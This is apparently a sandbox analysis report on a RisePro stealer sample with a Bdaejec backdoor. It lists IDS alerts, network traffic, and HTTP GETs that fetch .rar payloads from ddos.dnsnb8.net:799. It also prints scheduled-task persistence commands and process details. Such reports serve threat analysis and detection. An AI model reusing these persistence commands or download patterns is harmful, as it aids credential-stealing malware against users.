2024-07-25T02:16:56.571937+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49723	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:53.692444+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49721	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:34.626885+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49709	50500	192.168.2.10	193.233.132.62
2024-07-25T02:16:57.861221+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49722	50500	192.168.2.10	193.233.132.62
2024-07-25T02:16:43.267413+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49714	50500	192.168.2.10	193.233.132.62
2024-07-25T02:16:34.027382+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49708	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:40.273973+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49713	50500	192.168.2.10	193.233.132.62
2024-07-25T02:17:00.839786+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49724	799	192.168.2.10	44.221.84.105
2024-07-25T02:17:03.563869+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49726	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:50.770303+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49720	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:37.631540+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49709	50500	192.168.2.10	193.233.132.62
2024-07-25T02:17:24.819852+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49727	52.165.165.26	192.168.2.10
2024-07-25T02:16:30.743771+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49707	799	192.168.2.10	44.221.84.105
2024-07-25T02:16:47.540655+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49719	52.165.165.26	192.168.2.10

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 02:16:30.323812962 CEST	49707	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:30.328953981 CEST	799	49707	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:30.329042912 CEST	49707	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:30.329478979 CEST	49707	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:30.336174011 CEST	799	49707	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:30.743611097 CEST	799	49707	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:30.743724108 CEST	799	49707	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:30.743771076 CEST	49707	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:30.743829966 CEST	49707	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:30.749145031 CEST	49707	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:30.754101038 CEST	799	49707	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:33.600622892 CEST	49708	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:33.605627060 CEST	799	49708	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:33.605736971 CEST	49708	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:33.606467962 CEST	49708	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:33.611356974 CEST	799	49708	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:34.027318954 CEST	799	49708	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:34.027338982 CEST	799	49708	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:34.027381897 CEST	49708	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:34.027422905 CEST	49708	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:34.040843010 CEST	49708	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:34.045862913 CEST	799	49708	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:34.599961042 CEST	49709	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:34.604837894 CEST	50500	49709	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:34.604916096 CEST	49709	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:34.626884937 CEST	49709	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:34.631818056 CEST	50500	49709	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:36.862087011 CEST	49710	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:36.867377043 CEST	799	49710	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:36.867475986 CEST	49710	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:36.870415926 CEST	49710	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:36.875307083 CEST	799	49710	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:37.270068884 CEST	799	49710	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:37.270092964 CEST	799	49710	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:37.270173073 CEST	49710	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:37.270174026 CEST	49710	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:37.271182060 CEST	49710	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:37.276046991 CEST	799	49710	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:37.631540060 CEST	49709	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:37.636564970 CEST	50500	49709	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:40.241132975 CEST	49713	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:40.246176958 CEST	50500	49713	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:40.246440887 CEST	49713	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:40.249126911 CEST	49714	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:40.255311012 CEST	50500	49714	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:40.255418062 CEST	49714	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:40.273972988 CEST	49713	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:40.278959990 CEST	50500	49713	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:40.284810066 CEST	49714	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:40.290746927 CEST	50500	49714	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:43.236157894 CEST	49713	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:43.241175890 CEST	50500	49713	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:43.267412901 CEST	49714	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:43.272938967 CEST	50500	49714	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:50.345130920 CEST	49720	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:50.352262020 CEST	799	49720	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:50.352397919 CEST	49720	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:50.352586985 CEST	49720	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:50.357521057 CEST	799	49720	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:50.770221949 CEST	799	49720	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:50.770288944 CEST	799	49720	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:50.770303011 CEST	49720	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:50.770335913 CEST	49720	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:50.772769928 CEST	49720	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:50.777535915 CEST	799	49720	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:53.278872013 CEST	49721	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:53.283896923 CEST	799	49721	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:53.287858009 CEST	49721	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:53.288192987 CEST	49721	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:53.293371916 CEST	799	49721	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:53.692313910 CEST	799	49721	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:53.692425966 CEST	799	49721	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:53.692444086 CEST	49721	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:53.692512989 CEST	49721	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:53.693517923 CEST	49721	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:53.698815107 CEST	799	49721	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:54.841211081 CEST	49722	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:54.846167088 CEST	50500	49722	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:54.846262932 CEST	49722	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:54.878237009 CEST	49722	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:54.883217096 CEST	50500	49722	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:56.011591911 CEST	50500	49709	193.233.132.62	192.168.2.10
Jul 25, 2024 02:16:56.011770010 CEST	49709	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:56.185805082 CEST	49723	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:56.190808058 CEST	799	49723	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:56.190901995 CEST	49723	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:56.191471100 CEST	49723	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:56.196373940 CEST	799	49723	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:56.571852922 CEST	799	49723	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:56.571909904 CEST	799	49723	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:56.571937084 CEST	49723	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:56.571979046 CEST	49723	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:56.590423107 CEST	49723	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:16:56.595597029 CEST	799	49723	44.221.84.105	192.168.2.10
Jul 25, 2024 02:16:57.861221075 CEST	49722	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:16:57.866127968 CEST	50500	49722	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:00.434250116 CEST	49724	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:00.439364910 CEST	799	49724	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:00.439477921 CEST	49724	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:00.439752102 CEST	49724	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:00.444557905 CEST	799	49724	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:00.839658976 CEST	799	49724	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:00.839682102 CEST	799	49724	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:00.839786053 CEST	49724	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:00.840970039 CEST	49724	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:00.845799923 CEST	799	49724	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:00.919651985 CEST	49725	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:00.924678087 CEST	50500	49725	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:00.924776077 CEST	49725	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:00.963252068 CEST	49725	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:00.968432903 CEST	50500	49725	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:01.612186909 CEST	50500	49713	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:01.612296104 CEST	49713	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:01.633557081 CEST	50500	49714	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:01.633637905 CEST	49714	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:03.168735027 CEST	49726	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:03.173930883 CEST	799	49726	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:03.174101114 CEST	49726	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:03.176158905 CEST	49726	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:03.181046009 CEST	799	49726	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:03.563735008 CEST	799	49726	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:03.563796997 CEST	799	49726	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:03.563868999 CEST	49726	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:03.563919067 CEST	49726	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:03.566409111 CEST	49726	799	192.168.2.10	44.221.84.105
Jul 25, 2024 02:17:03.571280003 CEST	799	49726	44.221.84.105	192.168.2.10
Jul 25, 2024 02:17:03.940751076 CEST	49725	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:03.946271896 CEST	50500	49725	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:16.226605892 CEST	50500	49722	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:16.226700068 CEST	49722	50500	192.168.2.10	193.233.132.62
Jul 25, 2024 02:17:22.286350012 CEST	50500	49725	193.233.132.62	192.168.2.10
Jul 25, 2024 02:17:22.286473036 CEST	49725	50500	192.168.2.10	193.233.132.62

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 02:16:30.189325094 CEST	59684	53	192.168.2.10	1.1.1.1
Jul 25, 2024 02:16:30.284832954 CEST	53	59684	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 02:16:30.189325094 CEST	192.168.2.10	1.1.1.1	0x43bb	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 02:16:30.284832954 CEST	1.1.1.1	192.168.2.10	0x43bb	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	44.221.84.105	799	7456	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:16:30.329478979 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49708	44.221.84.105	799	7456	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:16:33.606467962 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49710	44.221.84.105	799	7456	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:16:36.870415926 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49720	44.221.84.105	799	1836	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:16:50.352586985 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49721	44.221.84.105	799	1836	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:16:53.288192987 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49723	44.221.84.105	799	1836	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:16:56.191471100 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49724	44.221.84.105	799	1836	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:17:00.439752102 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49726	44.221.84.105	799	1836	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 02:17:03.176158905 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	2
Start time:	20:16:27
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\hunta[1].exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hunta[1].exe"
Imagebase:	0xe80000
File size:	2'383'872 bytes
MD5 hash:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	20:16:27
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Imagebase:	0x210000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:16:33
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xb10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:16:33
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:16:33
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xb10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:16:33
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:16:33
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0x300000
File size:	2'383'872 bytes
MD5 hash:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	20:16:33
Start date:	24/07/2024
Path:	C:\ProgramData\MPGPH131\MPGPH131.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH131\MPGPH131.exe
Imagebase:	0x300000
File size:	2'383'872 bytes
MD5 hash:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	20:16:36
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1640
Imagebase:	0x6a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	20:16:47
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase:	0x270000
File size:	2'383'872 bytes
MD5 hash:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 95%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	20:16:47
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Imagebase:	0xb50000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:16:55
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Imagebase:	0x270000
File size:	2'383'872 bytes
MD5 hash:	651DE10CFAAA78BE50EDA9F3F0CE9EA7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	20:17:05
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\149657b0.bat" "
Imagebase:	0xd70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:17:05
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	8.8%
Total number of Nodes:	261
Total number of Limit Nodes:	26

Executed Functions

Function 01431044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01431223
WriteFile.KERNELBASE(00000000,FFFFCD8F,00003E00,?,00000000), ref: 01431252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 01431256
WinExec.KERNEL32(?,00000005), ref: 01431262

